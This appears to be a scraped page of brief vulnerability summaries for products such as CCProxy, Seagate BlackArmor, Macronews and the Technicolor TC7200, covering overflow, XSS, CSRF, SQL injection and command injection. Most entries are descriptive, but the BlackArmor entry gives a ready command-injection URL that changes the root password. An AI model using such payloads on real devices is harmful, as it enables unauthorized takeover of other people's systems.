CCProxy v7.3 is vulnerable to an Integer Overflow vulnerability due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted .ini file to the vulnerable application. This will cause a buffer overflow, allowing the attacker to execute arbitrary code on the target system.
When adding a user to the device, it is possible to enter a full name. This input field does not sanitize its input and it is possible to enter any payload which will get executed upon reload. The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input field does not sanitize its input.
There are multiple CSRF attacks possible, the proof of concept shows how it is possible to add a user with administrative privileges to the system. It is also possible to factory reset the device, reboot the device, add/edit/remove users, add/edit/remove shares and volumes.
The file getAlias.php located in /backupmgt has the following lines: $ipAddress = $_GET["ip"; if ($ipAddress != "") { exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt"); .. .. } The GET parameter can easily be manipulated to execute commands on the BlackArmor system. Proof of Concept: http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your command here>; Example to change the root password to 'mypassword': http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo 'mypassword' | passwd --stdin;
This exploit is a class MD5Decryptor which is used to decrypt the MD5 hash. It also has a subclass MD5DecryptorWeb which is used to get the wordlist from the URL. It also has a subclass MD5DecryptorGoogle which is used to get the wordlist from Google. It also has a function portcheck which is used to check the port of the host.
Taboada Macronews <= 1.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The exploit is achieved by sending malicious SQL queries to the vulnerable application. The attacker can use the LOAD_FILE() function to read files from the server.
POSTing a bad login page parameter causes the router to reboot.
A vulnerability in DirectControlTM Version 3.1.7.0 allows an attacker to extract version database and username & password via Post String Mssql Injection.
Multiple XSS vulnerabilities exist in Technicolor TC7200. A persistent XSS vulnerability exists in the 'WebFilteringdomainMode' parameter of the 'website-filters.asp' page, and a reflected XSS vulnerability exists in the 'VmTracerouteHost' parameter of the 'diagnostics-route' page. An attacker can exploit these vulnerabilities by sending a maliciously crafted request to the vulnerable page.
Multiple CSRF vulnerabilities exist in the Technicolor TC7200 modem. An attacker can exploit these vulnerabilities to perform a factory reset, disable the advanced options, remove IP filters, and remove firewall settings. No authentication is required to exploit these vulnerabilities.
Services By CQR